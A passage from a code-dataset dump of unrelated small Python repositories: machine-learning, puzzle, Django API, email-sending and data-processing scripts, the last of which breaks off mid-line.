Simplex(A, b, c, rule)\n obj.simplexBase()\n\n","repo_name":"Nagi19/Simplex-Algorithm","sub_path":"simplex.py","file_name":"simplex.py","file_ext":"py","file_size_in_byte":6909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"33458324211","text":"from sklearn.linear_model import LinearRegression\nimport numpy as np\nfrom sklearn.cross_validation import KFold\nimport process_data as processed_data\n# Sklearn also has a helper that makes it easy to do cross validation\n\n# The columns we'll use to predict the target\npredictors = [\"Pclass\", \"Sex\", \"Age\", \"SibSp\", \"Parch\", \"Fare\", \"Embarked\"]\n\n# Initialize our algorithm class\nalg = LinearRegression()\n# Generate cross validation folds for the titanic dataset. It return the row indices corresponding to train and test.\n# We set random_state to ensure we get the same splits every time we run this.\nkf = KFold(processed_data.titanic.shape[0], n_folds=3, random_state=1)\n\npredictions = []\nfor train, test in kf:\n # The predictors we're using the train the algorithm. 
Note how we only take the rows in the train folds.\n    train_predictors = (processed_data.titanic[predictors].iloc[train,:])\n    # The target we're using to train the algorithm.\n    train_target = processed_data.titanic[\"Survived\"].iloc[train]\n    # Training the algorithm using the predictors and target.\n    alg.fit(train_predictors, train_target)\n    # We can now make predictions on the test fold\n    test_predictions = alg.predict(processed_data.titanic[predictors].iloc[test,:])\n    predictions.append(test_predictions)\n\n# The predictions are in three separate numpy arrays. Concatenate them into one.\n# We concatenate them on axis 0, as they only have one axis.\npredictions = np.concatenate(predictions, axis=0)\n\n# Map predictions to outcomes (only possible outcomes are 1 and 0)\npredictions[predictions > .5] = 1\npredictions[predictions <= .5] = 0\naccuracy = sum(predictions == processed_data.titanic[\"Survived\"]) / len(predictions)\nprint(accuracy)","repo_name":"raghav/kaggle_titanic_problem","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"35922009041","text":"def createEvent(title, capacity, timeStart, timeEnd, lastTimeToLeave,\n            desc, fee, earlyBirdTime ):\n    buf = {\n        'title':title,\n        'capacity':capacity,\n        'timeStart':timeStart,\n        'timeEnd':timeEnd,\n        'lastTimeToLeave':lastTimeToLeave, \n        'description':desc,\n        'fee':fee,\n        'earlyBirdTime': earlyBirdTime\n    }\n    return buf\n\nclass Sample_Events():\n\n    def __init__(self):\n        e1 = createEvent(\n            \"2018 Mitsubishi Sustainability Lecture: The Promise and Peril of the Fourth Industrial Revolution\",\n            \"900\",\n            \"2018-05-30T17:30\",\n            \"2018-05-30T21:00\",\n            \"2018-05-30T18:30\",\n            \"The lecture will explore how we might realise the benefits of sustainable, responsible and human-centred innovation.\",\n            \"40\",\n            \"2018-05-27T17:30\"\n        )\n\n\n        e2 = createEvent(\n            \"Lethal Autonomous Robots and the plight of the non-combatant\",\n            \"50\",\n            \"2018-05-30T18:00\",\n            \"2018-05-30T19:15\",\n            \"2018-05-30T18:05\",\n            \"Roboticist and robot ethics expert Ron Arkin asks if robots should be soldiers?\",\n            \"20\",\n            \"2018-05-30T12:00\"\n        )\n\n\n        e3 = createEvent(\n            \"Hacky Hour with special guest Dr Jack Yang\",\n            \"40\",\n            \"2018-05-31T15:00\",\n            \"2018-05-31T16:00\",\n            \"2018-05-31T15:30\",\n            \"Hacky Hour with a special talk on Accelerating Material Discovery with Artificial Intelligence by Dr Jack Yang.\",\n            \"5000\",\n            \"2018-04-31T15:00\"\n        )\n\n        e4 = createEvent(\n            \"How do we know what our students know? The benefits of a hurdle-based approach to learning and assessment\",\n            \"500\",\n            \"2018-05-31T17:00\",\n            \"2018-05-31T18:30\",\n            \"2018-05-31T17:05\",\n            \"There’s a problem with the way we assess our students. 
We don’t know what they know...\",\n            \"8\",\n            \"2018-05-30T17:00\"\n        )\n\n\n        e5 = createEvent(\n            \"Software Carpentry (Intro to Unix, Python and Git)\",\n            \"800\",\n            \"2018-06-04T09:30\",\n            \"2018-06-15T09:30\",\n            \"2018-06-04T09:50\",\n            \"Join us for this live two-day coding workshop where we write programs that produce results, using the researcher-focused training modules from the highly regarded Software Carpentry Foundation.\",\n            \"40\",\n            \"2018-05-31T17:00\"\n        )\n\n\n        e6 = createEvent(\n            \"Reforming Australia's refugee policy: Where do we begin?\",\n            \"2000\",\n            \"2018-06-06T16:00\",\n            \"2018-06-06T17:00\",\n            \"2018-06-06T16:45\",\n            \"Please join us for this Grand Challenge meetup, with guest speaker Paul Power, CEO of the Refugee Council of Australia.\",\n            \"90000\",\n            \"2018-06-06T11:00\"\n        )\n\n\n        e7 = createEvent(\n            \"myExperience Dashboard: What's all the hype about?\",\n            \"50\",\n            \"2018-06-13T13:00\",\n            \"2018-06-13T14:00\",\n            \"2018-06-13T13:05\",\n            \"We will explain in more detail how the myExperience program is carried out and discuss how it is affecting QA/QE processes.\",\n            \"10\",\n            \"2018-06-10T13:00\"\n        )\n        self.events = [e1, e2, e3, e4, e5, e6, e7]\n\n","repo_name":"vickyw1112/EMS-Web","sub_path":"sample/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"41569623779","text":"\nimport pyailib as pl\n\npath = '../../data/files/english_sentence.txt'\n\nh = pl.HuffmanCoding(path)\n\noutput_path = h.compress()\nprint(\"Compressed file path: \" + output_path)\n\ndecom_path = h.decompress(output_path)\nprint(\"Decompressed file path: \" + decom_path)\n","repo_name":"antsfamily/pyailib","sub_path":"examples/compression/demo_huffman_coding.py","file_name":"demo_huffman_coding.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"15399539140","text":"import csv\n\ndef readdata(filenm):\n    data = {}\n    f=open(filenm)\n    reader = csv.DictReader(f)\n    for row in reader: \n        key = row.pop('NAME').upper()\n        data[key]=row\n    f.close()\n    return data\n\ndef get_rec(mydata,txt):\n    return mydata.get(txt) #,\"Key nonexistent\")\n#    return mydata[txt]\n#    for k, v in mydata.items():\n#        if k==txt :\n#            return v\n        #print(k, v)\n\n\nmydata = readdata(\"class.csv\")\nprint(mydata.keys())\nprint(\"Select Comma delimited list of Name IDs or ALL to export records to file\\n\")\ninp=input('Enter Choice:')\nwith open('lesson.txt','w') as f:\n    field_names = ['NAME', 'SEX', 'AGE', 'HEIGHT', 'WEIGHT']\n    writer=csv.DictWriter(f,fieldnames=field_names)\n    writer.writeheader()\n    if inp.upper()=='ALL':\n        for k, v in mydata.items(): \n            v.update({'NAME':k})\n            writer.writerow(v)\n        #csv.writer(f).write(mydata.items())\n    else:\n        for i in inp.split(','):\n            data=get_rec(mydata,i)\n            data['NAME']=i\n            writer.writerow(data)\n\n# with open('lesson.txt','w') as f:\n#     csv.writer(f).writerows(z.items())\n#     f.write(f'\\n' + z + '\\n')\n    \n#print(z)\n\n#data_points = [\"id\",\"age\",\"sex\"]\n\n\n\n\n# data=[]\n# f= open(r\"class.csv\",'r')\n# for line in f:\n#     data_line=line.strip().split(',')\n#     data.append(data_line)\n#     print(line)\n# print (data)\n# f.close()\n\n# import pandas as pd\n# df = pd.read_csv('class.csv')\n# print(df)\n\n\n\n\n\n\n\n# import csv\n# def read_data(input_file):\n#     \"\"\"read in the data and return a dictionary\"\"\" \n#     data = {}\n#     with open(input_file) as 
infile:\n#         reader = csv.DictReader(infile)\n#         for row in reader:\n#             key = row.pop('NAME').upper()\n#             data[key]=row\n#     return data \n\n    \n# def get_subject_details(subject,data):\n    \n#     try:\n#         return data[subject]\n#     except KeyError:\n#         raise KeyError(\"Subject not found\")\n    \n\n# if __name__==\"__main__\":\n#     data = read_data(\"class.csv\")\n    \n#     value = get_subject_details(\"ALICE\",data)\n    \n#     print(value)","repo_name":"thunter2309/assignments","sub_path":"Lesson3/Lesson3.py","file_name":"Lesson3.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38939995268","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport csv\nimport json\nimport os\n\n\nclass Tools:\n\n    \"\"\"\n    Class responsible for providing the most commonly used tools\n    Author: Ismael Pires\n    \"\"\"\n\n    def __init__(self):\n        pass\n\n    @classmethod\n    def format_data(cls, _path, _output='list'):\n\n        if _path is None:\n            return None\n\n        try:\n\n            extension = os.path.splitext(_path)[1][1:].strip().lower()\n\n            if extension == 'json':\n\n                with open(_path) as json_file:\n                    return json.load(json_file)\n\n            elif extension == 'csv':\n                with open(_path) as csv_file:\n\n                    # Reading the data from the csv file\n                    csv_reader = csv.reader(csv_file, delimiter=';')\n                    result = {}\n\n                    # Defining the data dictionary\n                    for row in csv_reader:\n\n                        # Defining each item of the dictionary; the first item in the list is the dictionary key\n                        result[row[0]] = row[1:]\n\n                    return result\n\n            else:\n                return None\n\n        except (AttributeError, ValueError, TypeError, KeyboardInterrupt, Exception) as e:\n            print('An error occurred while converting the data. [{}] (fd-01)'.format(e))\n            return None\n\n\n","repo_name":"ismael-pires/kohonen-algorithm","sub_path":"classes/Tools.py","file_name":"Tools.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"29294247246","text":"from data_classes.databse_file_handlers.smartphone import SmartPhone\nfrom random import randint\nimport pickle\n\nsmart_phone1 = SmartPhone(\"Samsung\", \"A50\", 500,\n                          \"Taiwan\", \"Samsung INC\", randint(1, 100000000), [])\nsmart_phone2 = SmartPhone(\"Nokia\", \"3310\", 130, \"Finland\",\n                          \"Nokia INC\", randint(1, 100000000), [])\nsmart_phone3 = SmartPhone(\"Apple\", \"Iphone 7s\", 500,\n                          \"China\", \"Apple INC\", randint(1, 100000000), [])\nsmart_phone4 = SmartPhone(\"Apple\", \"Iphone X\", 800,\n                          \"China\", \"Apple INC\", randint(1, 100000000), [])\nsmart_phone5 = SmartPhone(\"Huawei\", \"P40 Pro\", 700,\n                          \"China\", \"Huawei INC\", randint(1, 100000000), [])\n\nlinked_data_paths = {\"data_path\": \"bin/smartphone_data\",\n                     \"metadata_path\": \"bin/smartphone_metadata.json\", \"database_type\": \"serial\"}\n\ndata = []\ndata.append(smart_phone1)\ndata.append(smart_phone2)\ndata.append(smart_phone3)\ndata.append(smart_phone4)\ndata.append(smart_phone5)\n\n\nfile_name = type(smart_phone1).__name__.lower()\n\n# for d in data:\n#     print(str(d))\n\n\nprint(file_name)\nwith open(\"data/\"+file_name, 'wb') as data_file:\n    # we use pickle to serialize into a binary file\n    pickle.dump(linked_data_paths, data_file)\n\n\n# res = None\n# with open(\"bin/smartphone_data\", \"rb\") as f:\n#     res = pickle.load(f)\n\n# 
print(res)\n","repo_name":"mijicstefan/simsNEW","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34567470393","text":"import smtplib\nfrom config import Config\nimport logging\n\nconfig = Config()\nlogger = logging.getLogger(__name__)\n\n\ndef send_email(receiver, subject, text):\n    server = smtplib.SMTP('smtp.gmail.com', 587)\n    server.ehlo()\n    server.starttls()\n    server.login(config.EMAIL_USERNAME, config.EMAIL_PASSWORD)\n\n    body = '\\r\\n'.join(['To: {}'.format(receiver),\n                        'From: {}'.format(config.EMAIL_USERNAME),\n                        'Subject: {}'.format(subject),\n                        '', text])\n\n    try:\n        server.sendmail(config.EMAIL_USERNAME, [receiver], body)\n        logger.debug(\"Email to {} with subject: {} sent\".format(receiver, subject))\n    except Exception as e:\n        logger.error(\"Could not send email. Error: {}\".format(e))\n\n    server.quit()\n","repo_name":"KrasnovVitaliy/postback_collector","sub_path":"app/email_sender.py","file_name":"email_sender.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27944410536","text":"def solution(m, n, puddles):\n    matrix=[[0]*m for _ in range(n)] # number of paths\n\n    # initial values\n    for x,y in puddles:\n        matrix[x-1][y-1]=None\n\n    for row in range(1,n):\n        if matrix[row][0]==None:\n            break\n        matrix[row][0]=1\n\n    for col in range(1,m):\n        if matrix[0][col]==None:\n            break\n        matrix[0][col]=1\n    \n    #dp\n    for i in range(1,n):\n        for j in range(1,m):\n            if matrix[i][j]!=None:\n                upper=matrix[i-1][j]\n                left=matrix[i][j-1]\n\n                if upper==left==None:\n                    matrix[i][j]=None\n                elif upper==None:\n                    matrix[i][j]=left%1000000007\n                elif left==None:\n                    matrix[i][j]=upper%1000000007\n                else:\n                    matrix[i][j]=(upper+left)%1000000007\n    \n    answer=matrix[n-1][m-1]\n    return answer\n\nm=4\nn=3\n# puddles=[[2,2]]\npuddles=[]\nprint(solution(m,n,puddles))","repo_name":"minji1110/algorithm_python","sub_path":"programmers/등굣길.py","file_name":"등굣길.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21160036771","text":"import numpy as np\nfrom collections import defaultdict\nimport math\nfrom functools import reduce\nfrom operator import mul\n\nnp.set_printoptions(linewidth=300)\n\n\ndef read_file() -> list:\n    with open(f\"{__file__.rstrip('main.py')}input.txt\", \"r\") as f:\n        return [line for line in f.read().split(\"\\n\\n\")]\n\n\ndef _prep_in(inp):\n    in_data = {}\n    for val in inp:\n        val = val.split(\"\\n\")\n        k = int(val[0].split(\" \")[1].replace(\":\", \"\"))\n        v = np.array([[c for c in line] for line in val[1:]])\n        in_data[k] = v\n    return in_data\n\n\ndef _edges(v):\n    e1 = v[0]\n    e2 = v[-1]\n    e3 = v[:, 0]\n    e4 = v[:, -1]\n    ee = [e1, e2, e3, e4]\n    ee = ee + [reversed(x) for x in ee]\n    return [''.join(x) for x in ee]\n\n\ndef _next_state(v):\n    for _ in range(4):\n        yield v\n        yield np.flip(v, axis=0)\n        v = np.rot90(v, k=3)\n\n\ndef _find_next_square(new_k, new_v, eem, in_data):\n    e3 = ''.join(new_v[:, -1])\n    tmp_k = [x for x in eem[e3] if x != new_k][0]\n    new_vv = in_data[tmp_k]\n    for nnv in _next_state(new_vv):\n        if e3 == ''.join(nnv[:, 0]):\n            return tmp_k, nnv\n\n\ndef _check_all_poss_1(in_data):\n    eem = defaultdict(list)\n    for k, v in in_data.items():\n        for e in _edges(v):\n            eem[e].append(k)\n\n    cors = []\n    for k, v in in_data.items():\n        cnt = sum([len(eem[e]) - 1 for e in _edges(v)[:4]])\n        if 
cnt == 2:\n            cors.append(k)\n\n    return reduce(mul, cors)\n\n\ndef _check_all_poss_2(in_data):\n    sqr = int(math.sqrt(len(in_data)))\n\n    eem = defaultdict(list)\n    for k, v in in_data.items():\n        for e in _edges(v):\n            eem[e].append(k)\n\n    cors = []\n    for k, v in in_data.items():\n        cnt = sum([len(eem[e]) - 1 for e in _edges(v)[:4]])\n        if cnt == 2:\n            cors.append(k)\n\n    ltk = cors[0]\n    ltv = in_data[ltk]\n    for nltv in _next_state(ltv):\n        if ((len(eem[''.join(nltv[:, -1])]) == 2)\n                and (len(eem[''.join(nltv[-1])]) == 2)):\n            ltv = nltv\n            break\n\n    big_square_ind = [[None] * sqr for _ in range(sqr)]\n    big_square_ind[0][0] = (ltk, ltv)\n    for y in range(sqr):\n        if y > 0:\n            ak, av = big_square_ind[y - 1][0]\n            nk, nv = _find_next_square(ak, np.flip(\n                np.rot90(av, k=1), axis=0), eem, in_data)\n            big_square_ind[y][0] = (nk, np.flip(np.rot90(nv, k=1), axis=0))\n\n        for x in range(1, sqr):\n            ak, av = big_square_ind[y][x - 1]\n            big_square_ind[y][x] = _find_next_square(ak, av, eem, in_data)\n\n    rows = []\n    for y in range(sqr):\n        rows.append(\n            np.hstack(\n                [big_square_ind[y][x][1][1:-1, 1:-1] for x in range(sqr)]))\n    big_image = np.vstack(rows)\n\n    monster = np.array([\n        ['.', '.', '.', '.', '.', '.', '.', '.', '.', '.',\n         '.', '.', '.', '.', '.', '.', '.', '.', '#', '.'],\n        ['#', '.', '.', '.', '.', '#', '#', '.', '.', '.',\n         '.', '#', '#', '.', '.', '.', '.', '#', '#', '#'],\n        ['.', '#', '.', '.', '#', '.', '.', '#', '.', '.',\n         '#', '.', '.', '#', '.', '.', '#', '.', '.', '.']\n    ])\n    ly_m = len(monster)\n    lx_m = len(monster[0])\n    l_img = len(big_image)\n    for n_img in _next_state(big_image):\n        cnt = 0\n        for y in range(l_img - ly_m):\n            for x in range(l_img - lx_m):\n                good_one = True\n                for ym in range(ly_m):\n                    for xm in range(lx_m):\n                        if ((monster[ym][xm] == '#')\n                                and (n_img[y + ym][x + xm] != '#')):\n                            good_one = False\n                            break\n                    if not good_one:\n                        break\n                if good_one:\n                    cnt += 1\n        if cnt > 0:\n            break\n\n    res = np.count_nonzero(n_img == '#') - cnt * \\\n        np.count_nonzero(monster == '#')\n    return res\n\n\ndef part_1(inp):\n    in_data = _prep_in(inp)\n    res = _check_all_poss_1(in_data)\n    return res\n\n\ndef part_2(inp):\n    in_data = _prep_in(inp)\n    res = _check_all_poss_2(in_data)\n    return res\n\n\ndef main():\n    inp = read_file()\n    res_1 = part_1(inp)\n    print(f\"res_1: {res_1}\")\n    res_2 = part_2(inp)\n    print(f\"res_2: {res_2}\")\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"simmarum/AdventOfCode","sub_path":"2020/day-20/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"34495200667","text":"# PART 1 ----------------------\nwith open('input3.txt') as f:\n    datas = f.readlines()\n\ngamma = epsylon = ''\nfor i in range(len(datas[0]) - 1):\n    zero = one = 0\n    for data in datas:\n        if int(data[i]) == 0:\n            zero += 1\n        if int(data[i]) == 1:\n            one += 1\n    if zero > one:\n        gamma = gamma + '0'\n        epsylon = epsylon + '1'\n    if zero < one:\n        gamma = gamma + '1'\n        epsylon = epsylon + '0'\n\ngamma = int(gamma, 2)\nepsylon = int(epsylon, 2)\nconsumption = gamma * epsylon\n\nprint(\"The power consumption of the submarine is about\", consumption)\n\n# PART 2 ----------------------\ngenerator = datas.copy()\nscrubber = datas.copy()\nfor i in range(len(datas[0]) - 1):\n    zero = []\n    one = []\n    for index, data in enumerate(generator):\n        if int(data[i]) == 0:\n            zero.append(index)\n        if int(data[i]) == 1:\n            one.append(index)\n\n    if len(generator) > 1:\n        zero.reverse()\n        one.reverse()\n        if len(zero) == 
len(one):\n            for j in zero:\n                generator.pop(j)\n        elif len(zero) > len(one):\n            for j in one:\n                generator.pop(j)\n        elif len(zero) < len(one):\n            for j in zero:\n                generator.pop(j)\n\n    # ----------------------\n\n    zero = []\n    one = []\n    for index, data in enumerate(scrubber):\n        if int(data[i]) == 0:\n            zero.append(index)\n        if int(data[i]) == 1:\n            one.append(index)\n\n    if len(scrubber) > 1:\n        zero.reverse()\n        one.reverse()\n        if len(zero) == len(one):\n            for j in one:\n                scrubber.pop(j)\n        elif len(zero) < len(one):\n            for j in one:\n                scrubber.pop(j)\n        elif len(zero) > len(one):\n            for j in zero:\n                scrubber.pop(j)\n\nprint(\"The life support rating of the submarine is about\", int(generator[0], 2) * int(scrubber[0], 2))\n","repo_name":"Squify/Advent-of-Code-2021","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"1680294261","text":"__author__ = 'zwilson'\r\n\r\nimport math\r\nimport time\r\nstart_time = time.time()\r\n\r\ndef is_prime(n):\r\n\r\n    prime = True\r\n\r\n    if n == 2:\r\n        prime = True\r\n    elif n % 2 == 0:\r\n        prime = False\r\n    elif n == 1 or n == -1:\r\n        prime = False\r\n    elif n < 0:\r\n        prime = False\r\n\r\n    if prime == True:\r\n        size = int(math.sqrt(n)) // 2\r\n        for i in range(0,size):\r\n            if n % (3 + 2 * i) == 0:\r\n                return False\r\n    return prime\r\n\r\ntotal = 0\r\nmax_count = 0\r\nprimes = [2]\r\nstart = 0\r\ni = 3\r\n\r\nwhile(i < 5000000):\r\n\r\n    if is_prime(i):\r\n        primes.append(i)\r\n    i += 2\r\n\r\ni = 1\r\n\r\nfor i in range(0, len(primes)):\r\n\r\n    local_total = 0\r\n\r\n    j = 0\r\n    while (local_total + primes[i+j] < 1000000):\r\n        local_total += primes[i+j]\r\n        j += 1\r\n\r\n    if j > max_count and is_prime(local_total):\r\n        max_count = j\r\n        total = local_total\r\n\r\nprint(is_prime(total))\r\n\r\nprint(\"Total: \" + str(total))\r\nprint(\"Start: \" + str(max_count))\r\nprint(\"Run Time: %s seconds\" % (time.time() - start_time))","repo_name":"blueshift-1/Project_Euler","sub_path":"Problem_0050.py","file_name":"Problem_0050.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"29983718372","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom .models import Review\nfrom foods.models import DailyFood\nfrom .serializers import ReviewSerializer, ReviewListSerializer\n\n\n@api_view(['GET'])\n@permission_classes([AllowAny])\ndef get_daily_food_review(request, dailyfood_id):\n    daily_food = get_object_or_404(DailyFood, id=dailyfood_id)\n    if daily_food:\n        reviews = Review.objects.filter(food=daily_food.food)[::-1]\n        serializer = ReviewListSerializer(reviews, many=True)\n        return Response(serializer.data)\n    else:\n        return Response(status=status.HTTP_404_NOT_FOUND)\n\n\n# Create a review; verified with Postman (photos can be uploaded too)\n@api_view(['POST'])\ndef review_create(request, dailyfood_id):\n    daily_food = get_object_or_404(DailyFood, id=dailyfood_id)\n    if daily_food:\n        serializer = ReviewSerializer(data=request.data)\n        if serializer.is_valid(raise_exception=True):\n            serializer.save(user=request.user, food=daily_food.food, region=daily_food.region)\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\n    else:\n        return 
Response(status=status.HTTP_404_NOT_FOUND)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef review_get_delete_or_update(request, review_pk):\n    review = get_object_or_404(Review, pk=review_pk)\n\n    # Retrieve a review\n    # A single review is unlikely to be fetched on its own, so AllowAny is not added\n    def review_get(request, review):\n        serializer = ReviewSerializer(review)\n        return Response(serializer.data)\n\n    # Delete a review\n    def review_delete(request, review):\n        if request.user == review.user:\n            review.delete()\n            data = {\n                'delete' : f'Review {review_pk} written by {review.user} has been deleted.',\n            }\n            return Response(data, status=status.HTTP_204_NO_CONTENT)\n        # Either the review is not the requester's own or review_pk is missing, so return 400 for now\n        else:\n            return Response(status=status.HTTP_400_BAD_REQUEST)\n\n    # Update a review\n    def review_update(request, review):\n        updated_review = ReviewSerializer(review, data=request.data)\n        if updated_review.is_valid(raise_exception=True):\n            updated_review.save()\n        \n        reviews = Review.objects.all()\n        serializer = ReviewSerializer(reviews, many=True)\n        return Response(serializer.data)\n\n    if request.method == 'GET':\n        return review_get(request, review)\n    elif request.method == 'DELETE':\n        return review_delete(request, review)\n    elif request.method == 'PUT':\n        return review_update(request, review)","repo_name":"shinkimi0i8/ssahaksik","sub_path":"django-back/communities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30503224615","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\n\nfrom cordova.commands import COMMANDS, HelpCommand\n\nclass Console(object):\n    def __init__(self):\n        arguments = sys.argv\n        self.executable = arguments[0]\n        if len(arguments) < 2:\n            self.command = 'help'\n        else:\n            self.command = arguments[1]\n\n        self.arguments = []\n        if (len(arguments) > 2):\n            self.arguments = arguments[2:]\n\n    def run(self):\n        command = [command for command in COMMANDS if command.key == self.command]\n\n        if command and self.command != 'help':\n            command[0](self).run()\n        else:\n            HelpCommand(self, COMMANDS).run()\n\n        sys.exit(0)\n\ndef main():\n    console = Console()\n    console.run()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"heynemann/Cordova","sub_path":"cordova/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"37227318088","text":"#\n# Example file for working with conditional statements\n# \n\ndef main():\n    x, y = 1000, 100\n    \n    # conditional flow uses if, elif, else; switch cases do not exist in python\n    if(x < y):\n        string = \"x is less than y\"\n    elif(y < x):\n        string = \"x is greater than y\"\n    else:\n        string = \"x is equal to y\"\n    print(string) \n    # conditional statements let you use \"a if C else b\"\n    string = \"x is less than y\" if (x < y) else \"x is greater than or equal to y\" \n    print(string)\nif __name__ == \"__main__\":\n    main()\n","repo_name":"AHoffm24/python","sub_path":"Chapter2/conditionals.py","file_name":"conditionals.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"24584643583","text":"from typing import Optional\n\n# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\nclass Solution:\n    def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n        # linked_list_dict = set()\n\n        # while head and head 
not in linked_list_dict:\n # linked_list_dict.add(head)\n # head = head.next\n \n # return head\n # slow, fast = head, head\n\n # while slow and fast and fast.next:\n # slow = slow.next\n # fast = fast.next.next\n # if fast == slow:\n # break\n \n # if not fast or not fast.next:\n # return None\n \n # temp = head\n\n # while True:\n # if temp == fast:\n # return fast\n # if fast == slow:\n # temp = temp.next\n # fast = fast.next\n \n slow, fast = head, head\n\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if fast == slow:\n break\n else:\n return None\n\n while head != slow:\n head, slow = head.next, slow.next\n \n return head\n \n\n","repo_name":"brandoneng000/LeetCode","sub_path":"medium/142.py","file_name":"142.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30127956167","text":"\"\"\"Create list of all MPs.\"\"\"\n\n# data standard: https://www.popoloproject.com/specs/person.html\n\nimport datetime\nimport numpy as np\nimport pandas as pd\n\npath = './'\nsource_path = \"source/\"\ndata_path = \"data/\"\n\ncurrent_term = 'PSP9'\n\nregion_type = 'Volební kraj - 2002'\n\n# read osoby, transform to standard format\nosoby = pd.read_csv(path + source_path + \"osoby.unl\", sep=\"|\", encoding=\"cp1250\", header=None)\nheader = ['id', 'title_pre', 'family_name', 'given_name', 'title_post', 'birth_date', 'gender', 'updated_on', 'death_date', 'dummy']\nosoby.columns = header\nosoby['birth_date'] = osoby['birth_date'].apply(lambda x: datetime.datetime.strptime(x, '%d.%m.%Y').strftime('%Y-%m-%d'))\nosoby['death_date'] = osoby['death_date'].apply(lambda x: datetime.datetime.strptime(x, '%d.%m.%Y').strftime('%Y-%m-%d') if x is not np.nan else np.nan)\n\n# read poslanec\nposlanec = pd.read_csv(path + source_path + \"poslanec.unl\", sep='|', encoding='cp1250', header=None)\nheader = ['mp_id', 'id', 'region_id', 'list_id', 'org_id', 'web', 'street', 'municipality', 'postcode', 'email','phone', 'fax', 'psp_phone', 'facebook', 'photo', 'dummy']\nposlanec.columns = header\n\n# read organy\norgany = pd.read_csv(path + source_path + \"organy.unl\", sep='|', encoding='cp1250', header=None)\nheader = ['org_id', 'sup_org_id', 'type_org_id', 'org_abbreviation', 'org_name_cs', 'org_name_en', 'org_since', 'org_until', 'priority', 'members_base', 'dummy']\norgany.columns = header\norgany['org_since'] = organy['org_since'].apply(lambda x: datetime.datetime.strptime(x, '%d.%m.%Y').strftime('%Y-%m-%d'))\norgany['org_until'] = organy['org_until'].apply(lambda x: datetime.datetime.strptime(x, '%d.%m.%Y').strftime('%Y-%m-%d') if x is not np.nan else np.nan)\n\n# read typ_organu\ntyp_organu = pd.read_csv(path + source_path + \"typ_organu.unl\", sep='|', encoding='cp1250', header=None)\nheader = ['type_org_id', 'type_sup_org_id', 'type_org_name_cs', 'type_org_name_en', 'general_type_org_id', 'priority', 'dummy']\ntyp_organu.columns = header\nparlament_id = typ_organu[typ_organu['type_org_name_cs'] == 'Parlament']['type_org_id'].values[0]\n\n# read zarazeni\nzarazeni = pd.read_csv(path + source_path + \"zarazeni.unl\", sep='|', encoding='cp1250', header=None)\nheader = ['id', 'of_id', 'of_status', 'since', 'until', 'm_since', 'm_until', 'dummy']\nzarazeni.columns = header\nzarazeni['since'] = zarazeni['since'].apply(lambda x: datetime.datetime.strptime(x, '%Y-%m-%d %H').strftime('%Y-%m-%d'))\nzarazeni['until'] = zarazeni['until'].apply(lambda x: datetime.datetime.strptime(x, '%Y-%m-%d 
